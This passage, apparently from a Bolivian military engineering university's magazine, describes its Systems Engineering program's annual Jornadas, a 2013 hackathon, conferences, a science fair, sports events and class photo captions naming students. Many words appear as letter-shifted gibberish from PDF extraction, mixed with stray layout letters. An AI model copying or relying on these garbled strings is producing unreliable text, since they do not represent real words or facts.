0391/91 del Comando en Jefe de las Fuerzas Armadas de la Nación, el 3 de febrero de 1991. La necesidad de incorporar los últimos avances de la ciencia y la tecnología, que en el área de la Ingeniería de Sistemas se presentan en periodos muy cortos de tiempo, ha dado lugar a que el plan de estudios se actualice en promedio cada cinco años; la última versión, resultante de un diseño curricular por competencias, tiene vigencia del 2013 al 2017. 3H*HYYLYHJVULSWYVW}ZP[VKLJLY[PÄJHYSHMVYTHción profesional de primer nivel que proporciona a sus estudiantes, obtuvo acreditación internacional, con el CACEI, en el año 2004 y se ha re acreditado con excelencia en el año 2010. Los pilares de la universidad son la docencia, la investigación y la interacción social. - Contribuir a la plena implementación de la interacción social en el proceso enseñanza aprendizaje. Desarrollar actividades de interacción entre estudiantes y docentes que contribuyan a la adquisición de las competencias del saber ser y del saber hacer en las distintas asignaturas de la Carrera. Reforzar el componente de interacción social en los procesos de autoevaluación y acreditación. Celebrar el aniversario de creación de la Carrera Premiar a los ganadores de las distintas actividades organizadas por la Carrera a lo largo del año. P A R A D I ACTIVIDADES Las Jornadas comprenden las siguientes actividades: 1) INAUGURACIÓN Las Jornadas se inauguran en acto sujeto a programa especial, con participación de autoridades de la EMI y de la comunidad docente y estudiantil de la Carrera. LUGAR: Auditorio de la sede Irpavi de la EMI. 2) CICLO DE CONFERENCIAS. En el modelo académico basado en competencias profesionales, se hace énfasis en el aprendizaje del estudiante, en el que tienen relevante importancia la investigación y la interacción social. Son exposiciones sobre temas de actualidad del área, a cargo de representantes de instituciones gubernamentales y empresas privadas del medio. Las actividades académicas en la EMI, cada año, se inician después del día aniversario de la Carrera. OBJETIVO: Presentar a la comunidad docente estudiantil de la Carrera temas del área, relacionados G M A 77 P A R con la problemática nacional actual y con la implementación en el medio de los últimos avances tecnológicos en Ingeniería de Sistemas. TIEMPO DE DURACIÓN: 45 minutos de exposición y debate por conferencia. OBJETIVO: Incentivar el compañerismo de estudiantes y docentes de la Carrera. LUGAR: Campus Alto Irpavi de la EMI LUGAR: Auditorio de la EMI sede Irpavi. 6) CLAUSURA DE LAS JORNADAS 3) CURSOS TALLER Es un acto sujeto a programa especial, donde se clausuran las Jornadas y se realiza la premiación a los ganadores de los eventos deportivos y de las distintas actividades programadas por la Carrera a lo largo del año. Son cursos en los que se hace énfasis en el saber hacer. OBJETIVO: Complementar los conocimientos adquiridos en las distintas asignaturas de la Carrera, con el aprendizaje de técnicas y herramientas vigentes de la Ingeniería de Sistemas. A TIEMPO DE DURACIÓN: 20 horas académicas. D CERTIFICACIÓN: Se otorgan a los participantes JLY[PÄJHKVZ KL ]HSVY J\YYPJ\SHY KL SH LU[PKHK X\L provee los disertantes y de la Carrera. DISERTANTES: Capacitadores invitados de entidades de prestigio del medio, especializadas en el área. G M A 78 OBJETIVO: Clausurar los Jornadas y premiar a los ganadores de la Feria de Ciencia y Tecnología, la competencia de programación, los campeonatos deportivos y otros eventos organizados por la Carrera y por otras entidades del medio, en los que participaron estudiantes y docentes de la Carrera. LUGAR: Campus Alto Irpavi de la EMI. RESOLUCIÓN DE INSTITUCIONALIZACIÓN LUGAR: Laboratorios de computación sede Irpavi de la EMI. I docentes y estudiantes de la Carrera preparan y comparten un refrigerio y números musicales. 4) CAMPEONATOS DEPORTIVOS La Resolución de Institucionalización de las Jornadas, emitida por el Consejo de la Carrera de Ingeniería de Sistemas, determina el 19 de Septiembre como fecha de celebración del aniversario de la Carrera, en homenaje al nacimiento de Ludwing von Bertalanfy, autor de la Teoría General de sistemas, fundamento de la profesión. El día de la clausura de las Jornadas (sábado), se Q\LNHUSHZÄUHSLZKLSVZJHTWLVUH[VZKLKPZ[PU[HZ disciplinas: fulbito, basketball, voleyball, raqueta y otros, que se inician con dos semanas de anterioridad. CONCLUSIONES OBJETIVO: Incentivar el compañerismo y el trabajo en equipo de estudiantes y docentes de la Carrera. Los cursos taller, promueven la investigación al dotar a los estudiantes del conocimiento teórico práctico de herramientas y técnicas vigentes en el mercado laboral. PARTICIPANTES: Un equipo de estudiantes por curso (semestre) en cada disciplina, asimismo participan equipos de docentes. LUGAR: Campus Alto Irpavi de la EMI. 5) EVENTO DE CONFRATERNIDAD El día de la clausura de las Jornadas se realiza un evento de confraternidad, en el que autoridades, La participación en actividades de grupo durante las Jornadas, contribuye favorablemente al trabajo en equipo y al aprendizaje colaborativo. La premiación incentiva la participación en eventos que apoyan a la investigación aplicada, principalmente la Exposición de Ciencia y Tecnología y la Competencia de Programación. ACTIVIDADES DE LA CARRERA DE INGENIERIA DE SISTEMAS PREMIO EMPRENDEDORES CON EL AUSPICIO DEL GOBIERNO AUTONOMO MUNICIPAL DE LA PAZ En el auditorio de la Escuela Militar de Ingenieria se realizó el taller para conformar y capacitar grupos de estudiantes innovadores con ideas de negocios o servicios, formando nuevos lideres en la generacion de nuevas empresas. P A R A Representante expositora Gobierno Autonomo Municipal de La Paz Presencia de Estudiantes de la carrera de Ingenieria de Sistemas COMPETENCIA DE PROGRAMACIÓN “HACKATON 2013” El 23 de agosto se realizó la competenecia de programación “HACKATON 2013” con el auspicio del Gobierno Autonomo Municipal de La Paz y CPM. El acto inaugural se realizó en el auditorio del GAMLP, con palabras del Ing. Wilmer Pimentel. D I G Encargados del CPM. fueron jueces para la programación en diferentes lenguajes como ANDROID, HTML 5 y Java entre otros. M A 79 P Estudiantes de diferentes semestres de la carrera quienes representaron a la EMI, obtuvieron los siete primeros lugares en la premiacion de dicho evento. A R A Acto de premiacion al terminar la jornada de programacion Los ganadores fueron merecedores a diferentes becas de estudio CAMPEONATO INTERNO DE LA CARRERA DE INGENIERÍA DE SISTEMAS Como parte de la celebración del aniversario de la carrera se desarrollaron campeonatos deportivos en las disciplinas de Basketball, Volleyball, Raqueta y Futsal. D I Primer lugar en la disciplina de Futsal [V:LTLZ[YL Primer lugar en la disciplina de Voleibol y )mZX\L[IVSTV:LTLZ[YL Segundo lugar en la disciplina de Futsal 8vo. Semestre Final de Frontón Primer lugar en la disciplina de Raquet Cnl. Juan Franco Vaca y Tcnl. DIM. Julio Cesar Narváez Tamayo Final de Basketball G M A 80 II JORNADAS DE INGENIERÍA DE SISTEMAS 2013 Del 2 al 5 de octubre se realizaron las II Jornadas de Ingeniería de Sistemas, con el propósito de desarrollar actividades de interacción social e investigación complementarias al Proceso Enseñanza Aprendizaje y de celebrar el 23 aniversario de la Carrera. Para consolidar la realización de las Jornadas en los años futuros, el Consejo de Carrera emitió la resolución No. 03/2013, en la que se aprueba la celebración del aniversario de la Carrera en la primera semana de octubre, considerando que el 1 de febrero, fecha de creación, no hay actividades académicas. El acto inaugural se realizó en el auditorio de la EMI, sede Irpavi, con palabras del Tcnl. DIM. Julio César Narváez Tamayo, Jefe de Carrera de Ingeniería de Sistemas y del Cnl. DAEN. Álvaro Ríos Oliver, Director de la Unidad Académica La Paz. P A R A D Cursos Taller En los laboratorios de computación, especialistas de la empresa EDUCOMSER dictaron los cursos de ANDROID, HTML 5 y Servidores LINUX, con la masiva participación de los estudiantes de la Carrera. I G 3HIVYH[VYPV(5+960+ 3HIVYH[VYPV¶/;43 M A 3HIVYH[VYPV¶:,9=0+69,:305<? 3HIVYH[VYPV(5+960+ 81 P A El Jefe de Carrera con Estudiantes de [V:LT El Jefe de Carrera con Estudiantes de [V:LT R A Estudiantes de 10mo. Sem. con la Sra. Lorena Miranda, Secretaria de la Carrera D Conferencias Con la activa participación del Ing. Sergio Toro y de la Ing. Patricia López, en el auditorio de la sede Irpavi se desarrollaron las conferencias programadas como parte de las II Jornadas de la Carrera I G M Lic. Roberto Sánchez. Director Nacional de Ciencia y Tecnología del Ministerio de EduJHJP}U;LTH!,S:H[tSP[L;\WHJ2H[HYP`Z\ZHWSPJHJPVULZ Ing. Sergio Toro, Lic. Roberto Sánchez; Tcnl. Cesar Narváez Ing. Germán Labraña. Director de Tecnologías de la Información del Viceministerio de Ciencia y Tecnología. ;LTH!0UMYHLZ[Y\J[\YH;LJUVS}NPJHWHYH,K\JHJP}U 0UN9VILY[VAHTIYHUH+PYLJ[VY+LZHYYVSSV6YN` TIC’s del GMLP. ;LTH!:LTmMVYVZ0U[LSPNLU[LZ`V[YHZPUUV]HJPVULZ A 82 P A Tcnl. Cesar Narváez, Ing. Roberto Zambrana Ing. Ing. Javier Berthin. Jefe Nacional de Soporte Internetworking Alpha Systems SRL. ;LTH!*VSHIVYHJP}U`*VT\UPJHJPVULZ<UPÄJHKHZ R A Tcnl. Cesar Narváez, Ing. Javier Berthin. 0UN/\TILY[V(IHZ[V1LMLKL:PZ[LTHZ(;; ;LTH!-PYTH+PNP[HS D I 0UN/\TILY[V(IHZ[V;JUS*LZHY5HYváez 0UN4HYxH4VYHSLZ.\[PtYYLa .LYLU[LKL4HYRL[PUN*636:( ;LTH!-HIYPJHKLZVM[^HYL G M A Tcnl. Cesar Narváez, Ing. María Morales .\[PtYYLa Participación activa de Estudiantes y Plantel de Docentes 83 P A XI EXPOSICIÓN DE CIENCIA Y TECNOLOGÍA EXPOCITE SISTEMAS 2013 El viernes 23 de agosto de Hrs. 9:00 a 13:00 se realizaró la IX FERIA EXPOSICION DE CIENCIA Y TECNOLOGÍA “EXPOCITE SISTEMAS 2013”, en la sede Irpavi de la Unidad Académica La Paz, con el propósito de presentar a la comunidad los proyectos de investigación elaborados por los estudiantes de la Carrera. En la presente gestión, además se expusieron proyectos de aplicación para las Fuerzas Armadas, en cumplimiento de las políticas de investigación de la EMI. Ganadores de la Feria de Ciencia y Tecnología Categoría A: Categoría B: R A 7YPTLYS\NHY!*VUZ[Y\JJP}UKL\UTPUP robot 7YPTLY3\NHY!:PZ[LTHKL4VK\SHJP}UWVY ancho de pulso :LN\UKVS\NHY!9LN\SHKVYKL[LTWLYHtura :LN\UKVS\NHY!:PZ[LTHKL,Z[LNHUVNYHfía basado en imágenes ;LYJLYS\NHY!:PZ[LTHKL:LN\YPKHKWHYH la Carceleta de la Policía Militar ;LYJLYS\NHY!4VKLSVKLHWSPJHJP}UKL una red estructurada para los Cuarteles D I G M A 84 De izquierda a derecha: Marcos Mauricio Landívar Fernández, Gabriel Calle Jurado, Willy Lliulli Herrera, Wilson Reas Alanoca, Behimar Moisés Alvarado Aranda, Lía Alexi Marín Quispe, Yvory Saavedra Daza, Jhosely Cruz Mamani, Santos Manolo Alarcón Alarcón, Jhoselyn Pamela Torrez Apaza, Ted Carrasco Carrasco, Iris Narella Luna Maidana, Francis Ángel Rojas López, Brandon Felipe Merlo Loza, William Castro Ayaviri, Henry Iván Quispe Acarapi 3er. Semestre P A R A D I G M A 85 A D I A R M A 86 De izquierda a derecha: Paricagua Siñani José Junior - Sánchez De La Cruz Ingrid Magaly - Mamani Quispe Walter Fernando - Abendaño Joseline Gabriela - Mamani Gutiérrez Freddy Bernardo - Dávila Tapia Lizeth Dayana – My. Ing. Palenque Ríos Erick Rolando - Quispe Jerónimo Judy Adriana - Jáuregui Salvatierra Diego - Mercado Gallardo Valeria Diana - Calvo Llanos José Ignacio - Ortuño Calvo Yury Yver - Limachi Herrera Dany Milton G 4to. Semestre P De izquierda a derecha: Mendoza Alarcón William Cesar, Mamani Foronda Félix Adrián, Tiniñi Coaquira Eyvind Emilio, Sánchez Gamboa Maya Isabel, Machaca Yapura Grecia Jorgelinda, Álvarez Chura Alejandra Stefany, Blanco Paucara Erik Abraham, Gutiérrez Guarachi Carlos Jesús 5to. Semestre P A R A D I G M A 87 A D I A R M A 88 De izquierda a derecha: Marino Peralta Diego Luis-Silvestre Castillo Roberto- Ayraldi Loza Yamilka Madai- Tte. Com. Sánchez Montalvo Rolando- Yujra Nina Giovana Edith- Quispe Flores Heber –Antequera Crespo Roger Oscar G 6to. Semestre P De izquierda a derecha: Bismark Jaime Rojas Córdova - Diego Carlos Feraudy Pinto - Mischell Sonia Huchani Huchani - Rudy Alanoca Solozano Rosario Cristal Canaviri Calisaya - Yeri Antonio Revollo Endara - Jessica Reina Tancara Zabala - Sergio Alejandro Morales Zubieta - Gabriela Marisol Espinoza Montes - Jorge Luis Castañeta Guachalla - Danitza Helen Vallejos Quiñones - Raúl Marco Antonio Colque García - Daysi Patty Ramírez Cesar Antonio Narváez Gutiérrez - Soledad Silvia Gutiérrez Parra 7mo. Semestre P A R A D I G M A 89 A D I A R M A 90 De izquierda a derecha: Pedro Ariel Castillo Mollinedo, Vladimir Vargas Álvarez, Vania Chipana Rollano, Jorge Hernando Candia Menacho, Yashira Melisa Ticona Mujica, Carlos Alexandro Pomares Nina, TF. CGON. Raúl Gilmar Cortez Laura, Ana Laura Castillo Alfaro, TF. CGON. Mario Rubén Ontiveros Daza, Bryan Reynaldo Ponce Contreras, Wara Vanesa Siñani López, Ademir Nina Miranda, Ximena Lisett Cangri Toro, Ricardo Trujillo Castañeta, Omar Chambi Torrez. G 8vo. Semestre P De izquierda a derecha: Navia Ortuño Walter Junior, Tapia Quezada Fidel Alejandro, Yujra Tucupa Romer, Del Villar Vásquez Douglas Leonard, Miranda Apala Gonzalo, Challco Chalco Robert Jonathan, Tinta Gómez Edwin Santos, Loza Mamani Miguel Ángel, Chávez Ramírez Khendy Mariela, Huallarte Huallarte Marcelo Rilmar, Gutiérrez Villegas Claudia Inés, Rivero Ruiz Rene Andrés, Aliaga Nisttahuz Dhemelza Paola, Orellana Ramírez Ariel Alex, Quisbert Anti Israel, Loza Quenta Jhonny Gabriel, Mamani Murga José Ignacio, Flores Salazar Diego Bruno, Yampasi Espejo Juan Jesús, Terrazas Rollano Saúl Meyer, Cortez Calle Jorge Cristóbal 9no. Semestre P A R A D I G M A 91 A D I A R M A 92 De izquierda a derecha: Bernardo Vargas Rivera, Sergio Rodrigo Terrazas Zenteno, Rodrigo Ledezma García, Rubén Cristhian López Quiroga, Juan José Alvarado Ramos, Juan Pablo Conde Mendoza, Diego Alejandro Alcoba Ortega y Daniel Julio Poppe Villa Romero. De izquierda a derecha: Luz Tatiana Canqui Mamani, Kely Jesmy Aguilar Alejo, Rocío Fabiola Angulo Velásquez, Ariana Wara Condo Lazarte y Luz Alejandra Soto Tapia G 10mo. Semestre P P A R A D I G M A 93 P A R A D I G M A 94 P A R A D I G M A 95 P A R A D I G M A 96 P A R A D I G M A 97 P A R A D I G M A 98 P A R A D I G M A 99 P A R A D I G M A 100 MISIÓN Formar y especializar profesionales de excelencia con valores éticos, morales y cívicos; caracterizados por su responsabilidad social, liderazgo y disciplina, promoviendo la interacción social, la investigación científica y tecnológica, a fin de participar activamente en el desarrollo integral y sostenible del país. VISIÓN Ser la Universidad de mayor presencia en el país, con prestigio internacional y oferta académica en diversas áreas del conocimiento. Carreras VIGENTES LA PAZ INGENIERIA AGRONOMICA INGENIERIA AMBIENTAL INGENIERIA CIVIL INGENIERIA COMERCIAL INGENIERIA EN SISTEMAS ELECTRONICOS INGENIERIA DE SISTEMAS INGENIERIA GEOGRAFICA INGENIERIA INDUSTRIAL INGENIERIA PETROLERA INGENIERIA AGROINDUSTRIAL TECNICO SUPERIOR EN ANALISIS DE SISTEMAS TECNICO SUPERIOR EN SISTEMAS ELECTRONICOS Carreras NUEVAS INGENIERIA ECONOMICA INGENIERIA FINANCIERA INGENIERIA QUIMICA INGENIERIA DE MATERIALES INGENIERIA EN TELECOMUNICACIONES INGENIERIA MECATRONICA INGENIERIA MECANICA COCHABAMBA SANTA CRUZ RIBERALTA